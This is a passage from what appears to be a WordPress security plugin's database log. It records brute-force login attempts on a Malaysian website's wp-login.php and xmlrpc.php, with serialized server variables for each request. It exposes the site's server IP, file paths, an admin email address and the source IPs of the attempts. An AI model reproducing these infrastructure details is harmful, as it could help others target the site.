Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"176.53.12.11\";s:11:\"REMOTE_PORT\";s:5:\"54576\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYAn2GkPXSyJlCUJQmo8VQAAAZU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568679896.452\";s:12:\"REQUEST_TIME\";s:10:\"1568679896\";}}','notice','2019-09-17 00:24:57','2019-09-17 00:24:56',18262568,19560280,'https://bintara.com.my/xmlrpc.php',1,0,'176.53.12.11'),(24320,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"167.99.168.27\";s:11:\"REMOTE_PORT\";s:5:\"46324\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYAp8B@uZ4OC5N1Fn8ExNwAAAIg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568680432.303\";s:12:\"REQUEST_TIME\";s:10:\"1568680432\";}}','notice','2019-09-17 00:33:54','2019-09-17 00:33:52',17745104,19236032,'https://bintara.com.my/wp-login.php',1,0,'167.99.168.27'),(24321,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"167.99.168.27\";s:11:\"REMOTE_PORT\";s:5:\"46942\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYAp9GkPXSyJlCUJQmo9@gAAAZc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568680436.4748\";s:12:\"REQUEST_TIME\";s:10:\"1568680436\";}}','notice','2019-09-17 00:33:58','2019-09-17 00:33:56',18262744,19562016,'https://bintara.com.my/xmlrpc.php',1,0,'167.99.168.27'),(24322,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"97.74.234.94\";s:11:\"REMOTE_PORT\";s:5:\"42189\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYAvP2kPXSyJlCUJQmpCwgAAAYo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568681791.5874\";s:12:\"REQUEST_TIME\";s:10:\"1568681791\";}}','notice','2019-09-17 00:56:34','2019-09-17 00:56:31',17745296,19235768,'https://bintara.com.my/wp-login.php',1,0,'97.74.234.94'),(24323,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"97.74.234.94\";s:11:\"REMOTE_PORT\";s:5:\"42673\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYAvQ2kPXSyJlCUJQmpCxQAAAYU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568681795.8168\";s:12:\"REQUEST_TIME\";s:10:\"1568681795\";}}','notice','2019-09-17 00:56:37','2019-09-17 00:56:36',18258120,19556688,'https://bintara.com.my/xmlrpc.php',1,0,'97.74.234.94'),(24324,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"46.101.143.24\";s:11:\"REMOTE_PORT\";s:5:\"55284\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYAv39VIJ66zPtjtaf3ocwAAAUk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568681952.0786\";s:12:\"REQUEST_TIME\";s:10:\"1568681952\";}}','notice','2019-09-17 00:59:13','2019-09-17 00:59:12',17741496,19231464,'https://bintara.com.my/wp-login.php',1,0,'46.101.143.24'),(24325,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"46.101.143.24\";s:11:\"REMOTE_PORT\";s:5:\"56390\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYAv6B@uZ4OC5N1Fn8EySwAAAIA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568681960.3484\";s:12:\"REQUEST_TIME\";s:10:\"1568681960\";}}','notice','2019-09-17 00:59:21','2019-09-17 00:59:20',18257320,19557096,'https://bintara.com.my/xmlrpc.php',1,0,'46.101.143.24'),(24326,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"162.241.182.166\";s:11:\"REMOTE_PORT\";s:5:\"40282\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYAymmkPXSyJlCUJQmpGGAAAAYc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568682650.1964\";s:12:\"REQUEST_TIME\";s:10:\"1568682650\";}}','notice','2019-09-17 01:10:51','2019-09-17 01:10:50',17742344,19233088,'https://bintara.com.my/wp-login.php',1,0,'162.241.182.166'),(24327,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"162.241.182.166\";s:11:\"REMOTE_PORT\";s:5:\"40776\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYAynWkPXSyJlCUJQmpGGQAAAYA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568682653.4023\";s:12:\"REQUEST_TIME\";s:10:\"1568682653\";}}','notice','2019-09-17 01:10:55','2019-09-17 01:10:53',18257648,19556952,'https://bintara.com.my/xmlrpc.php',1,0,'162.241.182.166'),(24328,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 